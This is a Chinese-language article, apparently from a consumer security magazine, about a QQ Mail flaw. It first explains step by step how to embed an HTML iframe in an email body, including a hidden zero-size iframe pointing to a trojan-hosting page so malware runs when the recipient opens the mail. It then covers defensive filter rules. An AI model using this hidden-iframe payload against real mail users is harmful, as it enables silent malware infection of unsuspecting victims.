如今，使用QQ的用户非常多，为了方便，很多用户也一直使用QQ邮箱，毕竟在QQ聊天时就可以发邮件比另外打开网页发邮件要方便许多。但是，你可知道QQ邮箱也存在很多漏洞，即使你正常收发邮件，别人也能在“神不知，鬼不觉”的情况下让你运行木马。下面我们看看是如何实现的，以及如何防范。
　　
　　一、QQ 邮箱漏洞攻击测试
　　
　　要实现利用QQ邮箱漏洞而让对方中木马，非常简单，只要进行以下的两步即可完成，而且没有什么技术含量：
　　第一步：打开QQ邮箱，选择“新邮件”，输入收件人的地址，在邮件内容中输入：“＜ｈｔｍｌ＞＜ｂｏｄｙ＞＜ｉｆｒａｍｅｓｒｃ＝＂ｈｔｔｐ：／／ｗｗｗ．＊＊＊＊．ｃｏｍ．ｃｎ＂ｗｉｄｔｈ＝＂２００＂ｈｅｉｇｈｔ＝＂１００＂＞＜／ｂｏｄｙ＞＜／ｈｔｍｌ＞”（不含引号，中间的网址可以随意更换，注意一定要用半角的＜＞）。点击右上角的“ＨＴＭＬ”按钮，“确定”。（图１）
　　


　　第二步：再次点击HTML”按钮，这时你可以看到网页的预览，然后发送邮件。
　　对方接收到邮件后，不管所用的系统(包括Windows XP SP2在内)，都会弹出上面设定大小的网站广告窗口（其中width="200" height="100"就是设定弹出窗口的大小的。）。（图2）
　　


　　看到这里，可能很多朋友都已经明白如何实现攻击，顺利将木马发送到被攻击者邮件中了。
　　具体实现方法是：黑客把上面的代码修改为＜ｈｔｍｌ＞＜ｂｏｄｙ＞＜ｉｆｒａｍｅ　ｓｒｃ＝＂包含有木马的网页＂　ｗｉｄｔｈ＝＂０＂　ｈｅｉｇｈｔ＝＂０＂，这样就可以将短小的木马捆绑在指定的网页中，只要用户点击邮件，就非常容易就把木马种植到被入侵者的机器上了，打开邮件后，木马已经在运行了。
　　
　　提示：　ｗｉｄｔｈ＝＂０＂　ｈｅｉｇｈｔ＝＂０＂，这表示宽度和高度都为零，这样即可实现隐藏的目的，而让木马悄无声息地运行。
　　
　　二、如何防范QQ邮箱的漏洞
　　
　　上面给大家介绍了一个非常简单的攻击实例，也是很多喜欢使用QQ邮箱最容易受到攻击的途径，如何进行有效的防范呢？当然最有效的方式就是不要随意打开不熟悉的邮箱发来的邮件，除此以外，我们还可以从以下几个方面来加强防范。
　　
　　1.使用QQ Mail的远程控制
　　QQ Mail提供了与Foxmail相似的“远程管理”功能，而且使用方法很简单:打开QQ Mail后，按下F12键，打开“远程管理”窗口。如果邮件中有诸如“腾讯会员通知”、“你中奖啦”等主题直接删除即可，这些邮件即便不包含病毒，也多是垃圾信息。
　　
　　2.使用QQ Mail的邮件规则
　　利用QQ Mail的邮件规则，我们可以更进一步保护好自己的系统。
　　打开QQ Mail，选择菜单中的“工具→邮件过滤规则”。 在弹出窗口中点击“新建”按钮，接着在“过滤项”下选择“非QQ邮件”，点击“确定”。再次点击“新建”按钮，在“过滤项”下选择“非地址簿中用户发来的邮件”，然后在地址簿中加上你信任的QQ好友邮箱即可。 （图3）